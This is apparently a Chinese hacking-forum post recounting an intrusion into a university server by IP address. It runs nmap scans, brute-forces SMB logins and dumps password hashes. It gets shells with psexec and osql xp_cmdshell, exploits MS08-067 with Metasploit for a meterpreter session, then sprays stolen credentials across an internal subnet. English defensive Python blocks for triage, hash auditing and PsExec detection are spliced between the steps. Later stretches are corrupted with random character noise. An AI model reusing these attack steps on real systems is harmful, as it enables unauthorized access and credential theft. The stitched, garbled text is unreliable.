nmap+msf intrusion into Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
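The three script runs above (smb-enum-users, smb-enum-shares, smb-brute) each end in a "Host script results:" block, and that block is what an administrator scanning their own Windows 2000 hosts would want to triage automatically. The following Python is an added example, not code from the original post: it parses nmap's normal-output host-script block and turns the three results into rated findings (accounts enumerable anonymously, a null session on IPC$, and accounts whose password is blank or in a wordlist). The sample text is constructed to mirror the post's output; the Finding class and the severity scale are my own choices.

```python
import re
from dataclasses import dataclass

# Constructed sample modelled on the post's nmap output (not the original text).
SAMPLE = """\
Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
"""

HEADER_RE = re.compile(r"^ (\S[^:]*):\s*$")           # "| smb-brute:"
USERS_RE = re.compile(r"Users:\s*(.+)")
SHARE_RE = re.compile(r"^\s+(\S+)\s*$")               # "|   IPC$"
ACCESS_RE = re.compile(r"^\s+Anonymous access:\s*(\S+)")
LOGIN_RE = re.compile(r"^\s*(\S+?):(.*?)\s*=>\s*Login was successful")


@dataclass
class Finding:
    severity: str   # CRITICAL / HIGH / MEDIUM (my own rating scale)
    script: str     # NSE script that produced the evidence
    detail: str


def parse_host_scripts(text):
    """Split nmap's 'Host script results:' block into {script name: [output lines]}.
    Script output lines start with '| ' or '|_ ' (the latter marks a script's last line)."""
    scripts, current = {}, None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                          # port table, banner, etc.
        body = raw[1:]
        if body.startswith("_"):
            body = body[1:]
        m = HEADER_RE.match(body)
        if m:
            current = m.group(1)
            scripts[current] = []
        elif current is not None:
            scripts[current].append(body.rstrip())
    return scripts


def triage(text):
    """Turn the parsed script output into rated findings."""
    scripts = parse_host_scripts(text)
    findings = []
    for line in scripts.get("smb-enum-users", []):
        m = USERS_RE.search(line)
        if m:
            users = [u.strip() for u in m.group(1).split(",")]
            findings.append(Finding("MEDIUM", "smb-enum-users",
                f"{len(users)} accounts enumerable without credentials: {', '.join(users)}"))
    share = None
    for line in scripts.get("smb-enum-shares", []):
        m = ACCESS_RE.match(line)
        if m:
            if m.group(1) != "<none>":        # anonymous READ/WRITE means a null session works
                findings.append(Finding("HIGH", "smb-enum-shares",
                    f"share {share} allows anonymous {m.group(1)} access (null session)"))
            continue
        m = SHARE_RE.match(line)
        if m:
            share = m.group(1)
    for line in scripts.get("smb-brute", []):
        m = LOGIN_RE.match(line)
        if m:
            user, password = m.group(1), m.group(2)
            what = "an empty password" if password == "<blank>" else "a password found in a wordlist"
            findings.append(Finding("CRITICAL", "smb-brute", f"account {user} has {what}"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"[{f.severity}] {f.script}: {f.detail}")
```

Feeding it the output of `nmap -oN` runs against your own hosts gives a list that maps directly to fixes: restrict anonymous access (RestrictAnonymous) to close the null session, and reset the blank and dictionary passwords before anyone else runs smb-brute.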

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
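The smb-pwdump output above says more than the hashes themselves. A "NO PASSWORD" NT field means the account has a blank password; a stored LM hash means the NoLMHash policy is not enforced; and an LM second half equal to AAD3B435B51404EE (the LM hash of an empty 7-byte half) means the password is at most 7 characters, consistent with the six-character password smb-brute found for test. The following Python is an added example, not code from the post: it parses that line format and reports those weaknesses per account without cracking anything, the kind of audit an administrator runs over their own pwdump export. The sample lines are constructed from the post's output.

```python
import re

# Constructed sample modelled on the post's smb-pwdump output (not the original text).
SAMPLE = """\
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""

# An LM hash DES-encrypts a constant with each 7-byte half of the upper-cased
# password separately; an empty half always produces this value.
EMPTY_LM_HALF = "AAD3B435B51404EE"

LINE_RE = re.compile(
    r"^\|_?\s*(?P<user>[^:\s][^:]*):(?P<rid>\d+)\s*=>\s*(?P<lm>[^:]+):(?P<nt>.+?)\s*$")


def parse_pwdump(text):
    """Parse 'user:rid => LMHASH:NTHASH' lines as printed by smb-pwdump.nse."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append(m.groupdict())
    return rows


def audit_account(row):
    """Return the weaknesses visible from one account's hash pair."""
    issues = []
    lm, nt = row["lm"].upper(), row["nt"].upper()
    if nt.startswith("NO PASSWORD"):            # empty NT hash field = blank password
        issues.append("blank password")
        if row["rid"] == "500":
            issues.append("built-in Administrator (RID 500) has no password")
        return issues
    if not lm.startswith("NO PASSWORD"):        # LM hash present = NoLMHash not enforced
        issues.append("LM hash stored")
        if lm[16:] == EMPTY_LM_HALF:            # empty second half = password <= 7 characters
            issues.append("password is 7 characters or shorter")
    return issues


def audit(text):
    """Map each account name to its list of issues; accounts with none are omitted."""
    report = {}
    for row in parse_pwdump(text):
        issues = audit_account(row)
        if issues:
            report[row["user"]] = issues
    return report


if __name__ == "__main__":
    for user, issues in audit(SAMPLE).items():
        print(f"{user}: {'; '.join(issues)}")
```

Every account in the sample has at least one issue, which is the real lesson of this dump: the fix is not better hashing on the wire but NoLMHash, a minimum password length above 7, and no blank passwords on RID 500.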

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and run a command
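Both of the steps above leave host-side evidence a defender can alert on: PsExec installs a service on the target (System log event 7045 with service name PSEXESVC) right after a network (type 3) logon, and turning on xp_cmdshell is recorded by SQL Server as configuration-change message 15457. The following Python is an added example, not code from the post: it runs three detection rules over constructed event records modelled on those logs and correlates the service install with the preceding logon. The simplified field names, the 60-second window and the sample addresses are my assumptions.

```python
from datetime import datetime, timedelta
import ipaddress

# Constructed sample event records (not from the post). Field names are my own
# simplification of the Windows event fields; the xp_cmdshell text is modelled on
# SQL Server message 15457.
EVENTS = [
    {"time": "2012-02-29 00:30:01", "log": "Security", "id": 4624, "logon_type": 3,
     "user": "test", "src_ip": "203.0.113.10"},
    {"time": "2012-02-29 00:30:03", "log": "System", "id": 7045,
     "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    {"time": "2012-02-29 00:35:40", "log": "Application", "id": 15457, "source": "MSSQLSERVER",
     "message": "Configuration option 'xp_cmdshell' changed from 0 to 1. "
                "Run the RECONFIGURE statement to install."},
    {"time": "2012-02-29 00:36:02", "log": "Security", "id": 4624, "logon_type": 3,
     "user": "backup", "src_ip": "192.168.1.50"},
]

PRIVATE_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    """True for RFC 1918 addresses; anything else is treated as outside the LAN."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in PRIVATE_NETS)


def detect(events, window=timedelta(seconds=60)):
    """Run three rules over time-ordered events and return (severity, message) alerts."""
    alerts = []
    network_logons = []                          # (time, user, src_ip) of type-3 logons
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S")
        if ev["id"] == 4624 and ev.get("logon_type") == 3:
            network_logons.append((t, ev["user"], ev["src_ip"]))
            if not is_internal(ev["src_ip"]):
                alerts.append(("HIGH",
                    f"network logon as {ev['user']} from non-private address {ev['src_ip']}"))
        elif ev["id"] == 7045 and "PSEXESVC" in (ev.get("service", "") + ev.get("image", "")).upper():
            # PsExec's service appears seconds after the SMB logon that carried it in
            recent = [(u, ip) for lt, u, ip in network_logons if timedelta(0) <= t - lt <= window]
            if recent:
                user, ip = recent[-1]
                alerts.append(("CRITICAL",
                    f"PsExec service installed within {window.seconds}s of network logon as {user} from {ip}"))
            else:
                alerts.append(("HIGH", "PsExec service (PSEXESVC) installed"))
        elif ev.get("source") == "MSSQLSERVER" and "xp_cmdshell" in ev.get("message", "").lower():
            alerts.append(("HIGH", "xp_cmdshell enabled on SQL Server (message 15457)"))
    return alerts


if __name__ == "__main__":
    for sev, msg in detect(EVENTS):
        print(f"[{sev}] {msg}")
```

The internal logon by "backup" produces nothing, which is the point of the private-address check: the rule fires on exposure of SMB to the outside, not on ordinary file-server traffic.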

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // use the ms08-067 vulnerability in msf to overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)

msf  exploit(ms08_067_netapi) > sessions -l
2 p8 M& j" ~1 P  ?9 |8 z8 k7 W! Z" F
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt  g  M( ^" a) ^& L/ k
. n$ I3 Y% j' m% {/ J* U2 H
test' y$ [( f# N( R- ^2 O! ^
+ c' f; C4 w; o7 w
administrator
& l( U& E5 e. V, x$ o) f) q% l
+ x3 Y5 E, m  ?. I. V, b  broot@bt:/usr/local/share/nmap/scripts# vim password.txt+ o. Q1 j1 Q9 f
$ i: A$ u+ y2 H. k) }4 {
44EFCE164AB921CAAAD3B435B51404EE
! L/ }( a$ E) E( w( {- |% ^, L+ s$ J( z/ A) z2 ?8 ?
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
/ S+ J* S1 b) G9 N  M1 [. c2 M+ \) z: `( G7 D, D. o# o2 {/ ^3 y
//利用用户名跟获取的hash尝试对整段内网进行登录
9 H; ?% R8 ]7 b: Q( N4 A
9 u! H4 J. q: j* }Nmap scan report for 192.168.1.105
8 i( L  M, x4 K& l' \- i1 K
" [9 f( _" K8 B6 rHost is up (0.00088s latency).  _0 Z0 B6 O8 |2 a

8 U1 A* m% }6 PNot shown: 993 closed ports/ ?- V( A6 L  B# }/ f* m/ Q2 I3 M
1 ]4 K6 x) A, |2 ]/ m4 G! H% R
PORT     STATE SERVICE
- O9 Z2 o% W% @3 h" \
9 F5 Y, K$ T- X3 a135/tcp  open  msrpc
' k9 R! z* l+ O) e. B1 R" n
0 R5 B. V, i1 J9 n  _139/tcp  open  netbios-ssn
( o8 ?- M/ e1 y/ l, P5 |3 Y1 t3 W8 d' H7 y: h
445/tcp  open  microsoft-ds: ^  t! F# j! x" R5 i/ M. P/ }

, n5 X) l9 r+ p1 \1025/tcp open  NFS-or-IIS
) ]6 C' J! @# S, V! ~
0 v' b$ V. W( c0 ]- }1026/tcp open  LSA-or-nterm
; ~* q* B( e0 |$ x4 {+ S) q5 m6 \4 G2 E9 w/ d& Y* g( b) D) b
3372/tcp open  msdtc
4 k) }5 r4 A* K6 A5 y! ^  I
$ R$ f8 I5 Z% K- ]% D3 `5 p3389/tcp open  ms-term-serv5 h4 J; v! B' a6 \$ j/ A9 S

# A. R: Y- f- m8 V! tMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
% q. z, y# ?, m; z6 F3 q* \5 u+ T$ t. t3 R3 l0 Y' y
Host script results:
$ x3 U! i# H" A% P, t, \! R4 a. m
! d$ `: K$ A; |  d/ Y6 V- ]| smb-brute:* J4 a! O3 S6 Z% z  O0 |8 K* V

- C! F0 x& n1 z2 y3 I0 S|_  administrator:<blank> => Login was successful" O7 e% q: v( b# Z/ ^
& R- J  b3 c7 Y% x+ k
攻击成功,一个简单的msf+nmap攻击~~·0 Y6 r2 U, S* M* k) r  s

5 i( I/ Z. g+ A& m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表